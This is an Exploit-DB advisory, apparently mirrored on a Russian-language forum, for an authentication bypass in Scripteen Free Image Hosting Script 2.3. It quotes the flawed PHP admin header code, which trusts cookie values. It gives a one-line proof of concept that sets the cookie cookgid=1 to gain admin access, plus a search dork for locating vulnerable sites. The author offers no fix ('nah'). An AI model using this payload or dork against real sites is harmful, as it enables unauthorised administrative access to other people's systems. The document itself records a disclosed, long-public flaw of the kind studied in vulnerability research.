- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9256
- Проверка EDB
-
- Пройдено
- Автор
- QABANDI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4987
- Дата публикации
- 2009-07-24
Код:
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ\__
__/QQQ/````````````````\QQQ\___
_/QQQQQ/ \QQQQQQ\
/QQQQ/`` ```QQQQ\
/QQQQ/ \QQQQ\
|QQQQ/ By Qabandi \QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ\ iqa[a]hotmail.fr /QQQQ|
\QQQQ\ __ /QQQQ/
\QQQQ\ /QQ\_QQQQ/
\QQQQ\ \QQQQQQQ/
\QQQQQ\ /QQQQQ/_
``\QQQQQ\_____________/QQQ/\QQQQ\_
``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
``````````````````` `````
=Vuln: Scripteen Free Image Hosting Script V2.3 Insecure Cookie Handling
=INFO: http://www.scripteen.com/
=BUY: ---
=Download: http://www.scripteen.com/forum/news-announcements-f2-scripteen-free-image-hosting-script-v2-3-t631.html
=DORK: DORK:"Powered by Scripteen Free Image Hosting Script V 2.3"
____________
_-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````
none
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in ".\admin\header.php"
$userid=$_SESSION['userid'];
$usergid=$_SESSION['usergid'];
if (!$userid || empty($userid) || $userid==""){
$userid = $_COOKIE['cookid'];
$usergid = $_COOKIE['cookgid'];
}
// this is the scripts authentication code, pasted in all admin files.. fail.
if($usergid!="1")
{
header("Location: logout.php"); exit;
}
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
Set:
Cookie: cookgid=1
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
nah
---------------------------------------===--------------------------------------
______________________________________________________________________________
/ \
| ---------------------------------------------------------------------- |
\______________________________________________________________________________/
\ No More Private /
`````````````````
Salamz to All Muslim Hackers.
# milw0rm.com [2009-07-24]
- Источник
- www.exploit-db.com